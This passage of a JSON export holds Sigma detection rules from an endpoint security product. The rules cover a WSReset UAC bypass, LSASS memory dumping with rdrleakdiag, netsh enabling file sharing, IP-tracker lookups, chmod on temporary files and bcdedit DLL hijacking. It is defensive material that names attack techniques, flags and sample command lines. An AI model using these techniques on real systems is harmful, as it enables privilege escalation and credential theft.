"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073770Z",
"creation_date": "2026-03-23T11:45:34.073774Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073780Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.activecyber.us/activelabs/windows-uac-bypass",
"https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html",
"https://github.com/sailay1996/UAC_bypass_windows_store",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"
],
"name": "t1548_002_post_uac_bypass_wsreset.yml",
"content": "title: UAC Bypass Executed via WSReset\nid: 6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab\ndescription: |\n Detects a process being spawned by WSReset.exe.\n WSReset.exe has autoelevation capabilities and an integrity level of high.\n This is the result of an attack against a ShellExecuteW(\"ms-windows-store:PurgeCaches\") call inside WSReset.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to look for other alerts related to WSReset.exe UAC bypass preparation.\nreferences:\n - https://www.activecyber.us/activelabs/windows-uac-bypass\n - https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html\n - https://github.com/sailay1996/UAC_bypass_windows_store\n - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\ndate: 2020/10/12\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wsreset\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\WSReset.exe'\n\n filter:\n Image|endswith: 'Windows\\System32\\conhost.exe'\n\n exclusion_cliprenew:\n CommandLine:\n - 'cmd.exe /c %SystemRoot%\\system32\\ClipRenew.exe'\n - '?:\\WINDOWS\\system32\\cmd.exe /c %SystemRoot%\\system32\\ClipRenew.exe'\n\n condition: selection and not filter and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab",
"rule_name": "UAC Bypass Executed via WSReset",
"rule_description": "Detects a process being spawned by WSReset.exe.\nWSReset.exe has autoelevation capabilities and an integrity level of high.\nThis is the result of an attack against a ShellExecuteW(\"ms-windows-store:PurgeCaches\") call inside WSReset.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to look for other alerts related to WSReset.exe UAC bypass preparation.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ed761ef-dba9-462a-82b1-0154f3c13117",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078310Z",
"creation_date": "2026-03-23T11:45:34.078312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078316Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_with_rdrleakdiag.yml",
"content": "title: Process Memory Dumped via rdrleakdiag.exe\nid: 6ed761ef-dba9-462a-82b1-0154f3c13117\ndescription: |\n Detects a suspicious attempt to dump a process' memory using rdrleakdiag.exe.\n Rdrleakdiag.exe can be used as a LOLBin in order to dump the LSASS' process memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the process launching rdrleakdiag.exe for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen materials.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/09/12\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rdrleakdiag\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\rdrleakdiag.exe'\n - OriginalFileName: 'RdrLeakDiag.exe'\n\n selection_fullmemdmp:\n CommandLine|contains:\n - '/fullmemdmp'\n - '-fullmemdmp'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ed761ef-dba9-462a-82b1-0154f3c13117",
"rule_name": "Process Memory Dumped via rdrleakdiag.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using rdrleakdiag.exe.\nRdrleakdiag.exe can be used as a LOLBin in order to dump the LSASS' process memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to check the process launching rdrleakdiag.exe for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen materials.\n",
"rule_creation_date": "2022-09-12",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f2f1289-3da8-4c9c-a447-9fd95238d6b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079852Z",
"creation_date": "2026-03-23T11:45:34.079854Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079859Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1562_004_firewall_allow_file_printer.yml",
"content": "title: Share and Printer Traffic Enabled via netsh\nid: 6f2f1289-3da8-4c9c-a447-9fd95238d6b4\ndescription: |\n Detects a firewall filter modification that allows access to shares and printers over SMB.\n Allowing such traffic may let adversaries copy or access files over SMB shares, but also exploit vulnerabilities through newly exposed services, such as the spooler service.\n It is recommended to check for uncommon authentications or suspicious activity after the firewall rules are updated.\nreferences:\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2023/12/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'File'\n - 'Printer'\n - 'Sharing'\n - 'enable'\n\n # Exclusion for firewall rule deactivation (enable=no), which does not expose the services\n # netsh advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_general_electric_healthcare:\n ProcessParentImage|endswith: '\\VPAdmin.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'General Electric Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f2f1289-3da8-4c9c-a447-9fd95238d6b4",
"rule_name": "Share and Printer Traffic Enabled via netsh",
"rule_description": "Detects a firewall filter modification that allows access to shares and printers over SMB.\nAllowing such traffic may let adversaries copy or access files over SMB shares, but also exploit vulnerabilities through newly exposed services, such as the spooler service.\nIt is recommended to check for uncommon authentications or suspicious activity after the firewall rules are updated.\n",
"rule_creation_date": "2023-12-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f370d2a-b65a-4e09-a924-93832490b998",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083773Z",
"creation_date": "2026-03-23T11:45:34.083775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083780Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_unsigned_connection_ip_tracker.yml",
"content": "title: DNS Request to IP Trackers from Unsigned Process\nid: 6f370d2a-b65a-4e09-a924-93832490b998\ndescription: |\n Detects a DNS request to an IP address tracker service such as ipinfo.io from an unsigned process.\n Adversaries can use such services to monitor the spread of their malware and track the IP addresses of infected hosts.\n It is recommended to check the legitimacy of the process performing the request as well as its parent.\nreferences:\n - https://attack.mitre.org/techniques/T1016/\ndate: 2023/06/19\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection_exact:\n QueryName:\n - 'ipinfo.io'\n - 'ip-api.com'\n - 'ip-api.org'\n - 'ip.me'\n - 'ipify.org'\n - 'seeip.org'\n - 'icanhazip.com'\n - 'canihazip.com'\n - 'ident.me'\n ProcessSigned: 'false'\n\n selection_subdomain:\n QueryName|endswith:\n - '.ipinfo.io'\n - '.ip-api.com'\n - '.ip-api.org'\n - '.ip.me'\n - '.ipify.org'\n - '.seeip.org'\n - '.icanhazip.com'\n - '.canihazip.com'\n - '.ident.me'\n ProcessSigned: 'false'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\modjo-livenotes\\app-*\\modjo-livenotes.exe'\n - '?:\\EES32\\\\ees.exe'\n - '?:\\users\\\\*\\appdata\\roaming\\insertlinks\\insertlinks.exe'\n - '?:\\Biesse\\bSuiteActionHandler\\bSuiteActionHandler.exe'\n - '?:\\Program Files (x86)\\Vidoc\\scrobbler\\VidocScrobbler.exe'\n - '?:\\Program Files\\Vidoc\\scrobbler\\VidocScrobbler.exe'\n - '?:\\Program Files (x86)\\WindowsApps\\Evernote.Evernote_*\\app\\Evernote.exe'\n - '?:\\Program Files\\WindowsApps\\Evernote.Evernote_*\\app\\Evernote.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Evernote\\Evernote.exe'\n - '?:\\program files\\lightbulb\\lightbulb.exe'\n - '?:\\users\\\\*\\appdata\\local\\ciscoereader\\app-*\\cisco-ereader.exe'\n - '?:\\Program Files\\TacticalAgent\\tacticalrmm.exe'\n - '?:\\Program Files\\Fortify\\fortify.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\signitic\\Signitic.exe'\n - '?:\\Program Files\\WindowsApps\\\\*\\\\*.exe'\n - '?:\\Program Files\\NewBlueFX\\VegasStream\\VEGAS Stream.exe'\n - '?:\\Program Files (x86)\\Steam\\steamapps\\common\\Aim Lab\\AimLab_tb.exe'\n - '?:\\Program Files (x86)\\Steelcase\\RoomWizard Administrative Console\\RWAdmin.exe'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Program Files (x86)\\Raptor Technologies LLC\\RaptorHardwareService\\Raptorware.ClientService.Server.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\streamdeck\\plugins\\com.barraider.wintools.sdplugin\\com.barraider.wintools.exe'\n - '?:\\Program Files (x86)\\framiral\\avd\\avdstandalone.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Business Online SA *\\business online sa.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\station-desktop-app\\station.exe'\n - '?:\\Program Files (x86)\\evernote\\evernote.exe'\n - '?:\\Program Files\\dolphin anty\\dolphin anty.exe'\n - '?:\\Program Files (x86)\\echtherm\\fscommand\\\\*.exe'\n - '?:\\Program Files\\mercury\\mercury.exe'\n - '?:\\Program Files (x86)\\ajax pro desktop\\ajaxpro.exe'\n - '?:\\program Files\\Chromium\\Application\\chrome.exe'\n\n exclusion_insanermm:\n ProcessImage: '?:\\Program Files\\InsaneRMM\\InsaneRMM.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_httpd:\n ProcessCommandLine: '?:\\Apache24\\bin\\httpd.exe -d ?:/Apache24'\n ProcessParentCommandLine: '?:\\Apache24\\bin\\httpd.exe -k runservice'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f370d2a-b65a-4e09-a924-93832490b998",
"rule_name": "DNS Request to IP Trackers from Unsigned Process",
"rule_description": "Detects a connection to an IP address tracker service such as ipinfo.io from an unsigned process.\nAdversaries can use such services to monitor their malware's spreading and track the IP addresses of infected hosts.\nIt is recommended to check the legitimacy of the process performing the request as well as its parent.\n",
"rule_creation_date": "2023-06-19",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f41b447-3247-40d8-a860-f66a138a0ed4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094001Z",
"creation_date": "2026-03-23T11:45:34.094003Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094008Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://atomicredteam.io/execution/T1059.004/",
"https://gtfobins.github.io/gtfobins/chmod/",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_chmod_executable_in_temporary_folder.yml",
"content": "title: Execution Permission of a Temporary File Set via chmod\nid: 6f41b447-3247-40d8-a860-f66a138a0ed4\ndescription: |\n Detects a suspicious attempt to give the execution permissions to a temporary file using the chmod command.\n This is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\n It is recommended to investigate the file to determine its legitimacy.\nreferences:\n - https://atomicredteam.io/execution/T1059.004/\n - https://gtfobins.github.io/gtfobins/chmod/\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/06/19\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.defense_evasion\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.LOLBin.Chmod\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode|endswith: '7??'\n ProcessImage|endswith: '/chmod'\n ProcessCommandLine:\n - '*chmod ?7?? 
*'\n - '*chmod +x *'\n Path|startswith:\n - '/tmp'\n - '/var/tmp'\n\n filter_directories:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -R '\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/sbin/crond|'\n - '|/usr/bin/crio|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/teamquest/manager/'\n - '|/opt/BESClient/bin/BESClient|'\n - '|/usr/local/lsam-*/bin/sma_lsam|'\n - '|/opt/*/smgr/bin/ucybsmgr|'\n - '|/usr/bin/make|'\n\n exclusion_mkinitramfs:\n # cp -pP /bin/kbd_mode /var/tmp/mkinitramfs_2yUr1t//bin/kbd_mode\n # /var/tmp/dracut.2V0kBT/initramfs/kdumpscripts/monitor_dd_progress\n ProcessCommandLine|contains:\n - ' /var/tmp/mkinitramfs_??????/'\n - ' /var/tmp/dracut.??????/initramfs/'\n\n exclusion_mcaffee:\n ProcessCommandLine|contains: ' /tmp/ens_pkg/validate-mfeesp.sh'\n\n exclusion_apt:\n ProcessGrandparentImage: '/usr/lib/apt/methods/gpgv'\n\n exclusion_nxserver:\n ProcessGrandparentImage: '/usr/NX/bin/nxserver.bin'\n\n exclusion_gh_runner:\n ProcessParentCommandLine|startswith: '/bin/bash /root/gh-runner-scripts/'\n\n exclusion_puppetlab:\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessAncestors|contains: '|/opt/puppetlabs/puppet/bin/ruby|'\n\n exclusion_dispatch:\n Path:\n - '/tmp/*-dispatch-script.tmp.sh'\n - '/var/tmp/*-dispatch-script.tmp.sh'\n - '/tmp/*-dispatch-script.tmp.py'\n - '/var/tmp/*-dispatch-script.tmp.py'\n\n exclusion_veeam_1:\n Path:\n - '/tmp/VeeamAgent????????-????-????-????-????????????'\n - '/tmp/VeeamApp_????????-????-????-????-????????????'\n\n exclusion_veeam_2:\n # sudo -S -k -p VEEAM_PWD_PROMPT chmod 0766 /tmp/4d62246d-fccb-4f29-a9e7-8d094bd65bde\n # sudo -S -k -p VEEAM_PWD_PROMPT chmod 0766 /tmp/vindexing_c2c3dca7-ea7a-4ccc-af59-80babb9bcfaf/temp_ada23dab-bdd2-497a-aecf-ef0c3344ef80/summary.txt\n ProcessParentCommandLine|contains: 'VEEAM_PWD_PROMPT'\n\n exclusion_ansible:\n Path|contains:\n - '/tmp/ansible-tmp-*/'\n - '/tmp/.ansible-tmp-*/'\n\n 
exclusion_nakivo:\n ProcessParentImage: '/opt/nakivo/director/jre/bin/java'\n\n # A lot of build systems execute test binaries\n exclusion_make:\n - ProcessParentImage: '/usr/bin/make'\n - ProcessGrandparentImage: '/usr/bin/make'\n\n exclusion_timeshift:\n ProcessParentImage: '/usr/bin/timeshift'\n\n exclusion_mag2:\n ProcessParentCommandLine|startswith: '/bin/ksh /m2/appli/'\n\n exclusion_xpipe:\n ProcessParentImage: '/opt/xpipe/app/bin/xpiped'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_docker:\n ProcessAncestors|contains: '|/usr/bin/runc|/usr/bin/dockerd|'\n\n exclusion_git:\n ProcessGrandparentImage: '/usr/lib/git-core/git'\n\n exclusion_netdata:\n ProcessCommandLine:\n - 'chmod +x ./netdata-updater.sh'\n - 'chmod +x /tmp/netdata-test.*'\n ProcessParentCommandLine:\n - 'bash /etc/cron.daily/netdata-updater'\n - '/bin/sh /etc/cron.daily/netdata-updater'\n - '/bin/sh ./netdata-updater.sh '\n - '/bin/sh /tmp/netdata-updater-*/netdata-updater.sh *'\n - '/bin/sh ./netdata-installer.sh --auto-update *'\n\n exclusion_bootstrap:\n ProcessCommandLine: 'chmod 0700 /tmp/.sudo_bootstrap????????-????-????-????-????????????.sh'\n ProcessParentImage: '/usr/sbin/sshd'\n\n exclusion_install_java:\n ProcessParentCommandLine: '/bin/sh -x /tmp/cbe.*'\n ProcessGrandparentImage: '/tmp/install.dir.*/Linux/resource/jre/bin/java'\n\n exclusion_pyenv:\n ProcessCommandLine:\n - 'chmod +x ./config.status'\n - 'chmod +x /tmp/python-build-test.*'\n - 'chmod +x Modules/ld_so_aix'\n\n exclusion_kettle:\n ProcessCommandLine: 'chmod +x /tmp/kettle_*shell'\n ProcessParentImage|endswith: '/bin/java'\n\n exclusion_tabletopesimulator:\n ProcessCommandLine:\n - 'chmod +x libtool'\n - 'chmod +x config.nice'\n ProcessParentCommandLine:\n - '/bin/bash /tmp/pear/temp/*'\n - '/bin/bash ./config.status'\n - '/bin/bash ./config.status --quiet'\n\n exclusion_crio:\n ProcessCommandLine: 'chmod +x /tmp/k8star'\n 
ProcessGrandparentCommandLine|startswith: '/usr/bin/crio-crun --root /run/crun '\n\n exclusion_android-studio:\n ProcessCommandLine: 'chmod +x /tmp/shunit.*'\n ProcessAncestors|contains: '|/snap/android-studio/*/jbr/bin/java|'\n\n # Rundeck or Ansible\n exclusion_rundeck:\n ProcessCommandLine:\n - 'chmod +x /tmp/?????????????-*-dispatch-script.sh'\n - 'chmod +x /tmp/*-*-*.temp.sh'\n - 'chmod +x /tmp/*-*-*-*.temp.py'\n ProcessParentImage: '/usr/sbin/sshd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f41b447-3247-40d8-a860-f66a138a0ed4",
"rule_name": "Execution Permission of a Temporary File Set via chmod",
"rule_description": "Detects a suspicious attempt to give the execution permissions to a temporary file using the chmod command.\nThis is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\nIt is recommended to investigate the file to determine its legitimacy.\n",
"rule_creation_date": "2024-06-19",
"rule_modified_date": "2025-10-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f5ae5e9-afd3-47d8-8c09-3cf9e6889852",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592020Z",
"creation_date": "2026-03-23T11:45:34.592023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592031Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bcdedit.yml",
"content": "title: DLL Hijacking via bcdedit.exe\nid: 6f5ae5e9-afd3-47d8-8c09-3cf9e6889852\ndescription: |\n Detects potential Windows DLL Hijacking via bcdedit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bcdedit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6f5ae5e9-afd3-47d8-8c09-3cf9e6889852",
"rule_name": "DLL Hijacking via bcdedit.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bcdedit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6f6e37f2-2f9d-4b37-9d9a-74ed25de6333",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
